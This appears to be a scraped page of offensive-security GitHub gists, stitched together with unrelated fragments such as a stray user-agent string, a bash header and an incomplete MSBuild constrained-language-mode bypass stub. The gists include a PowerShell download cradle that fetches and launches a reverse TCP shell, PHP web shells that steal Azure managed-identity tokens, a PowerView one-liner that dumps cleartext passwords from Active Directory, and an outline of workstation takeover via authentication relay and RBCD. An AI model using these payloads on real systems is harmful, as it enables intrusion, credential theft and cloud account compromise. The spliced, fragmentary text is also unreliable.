<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<Target Name="Bypass">
<CLMBypass/>
</Target>
<UsingTask
TaskName="CLMBypass"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Reference Include="System.Management.Automation" />
#!/usr/bin/env bash
set -o errexit
set -o nounset
set -o pipefail
echo "[*] Creating temporary directory..."
TMPDIR="$(mktemp -d --suffix=_bloodhound-customqueries)"
# Compass BloodHound Customqueries
iex (New-Object
Net.Webclient).downloadstring("http://10.0.10.X/reversetcp.ps1")
Invoke-PowerShellTcp -Reverse -IPAddress 10.0.10.X -Port 8888
Mozilla/5.0 (Macintosh; Intel Mac OS X 12_3) AppleWebKit/605.1.15 (KHTML,
like Gecko) Version/15.3 Safari/605.1.15 Edg/100.0.4896.127
@C0axx
C0axx / Get-VaultToken.php
Last active January 3, 2023 18:28
Request Azure Keyvault Token
<?php
system('curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');
?>
@C0axx
C0axx / Get-GraphToken.php
Created January 3, 2023 18:16
Request access tokens for Azure Graph services
<?php
system('curl "$IDENTITY_ENDPOINT?resource=https://graph.windows.net/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');
?>
@C0axx
C0axx / Get-ManagementToken.php
Last active January 3, 2023 18:16
Request access tokens for Azure Management services
<?php
system('curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER');
?>
@C0axx
C0axx / gist:334294bafa7bd83cc9625fc1cfe71a2a
Created October 29, 2022 19:36 — forked from dafthack/gist:5f8c36f7468fad991e9e1f6d81ec29d4
PowerView One-Liner to Dump Cleartext Passwords From AD User Attributes
$users = Get-NetUser; $props=@(); $users | Get-Member | foreach-object{if($_.Name -notlike "badpassword*"){$props+=$_.Name}}; foreach($user in $users){ foreach($prop in $props){ if($user.$prop -like "*password*" -and $user.$prop -notlike "*dont_expire_password" -and $user.$prop -notlike "*RODC Password*"){Write-Output ($user.samAccountName + "[" + $prop + "]" + " : " + $user.$prop) } } }
@C0axx
C0axx / Workstation-Takeover.md
Created September 25, 2022 00:17 — forked from mgeeky/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. In short, this is accomplished by:

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

Keybase proof

I hereby claim:

  • I am c0axx on github.
  • I am c0axx (https://keybase.io/c0axx) on keybase.
  • I have a public key ASCQzho6XeMDopSCjSDM6aK-1ZgLmvNSEWiFP0b3BwHI-Ao

To claim this, I am signing this object: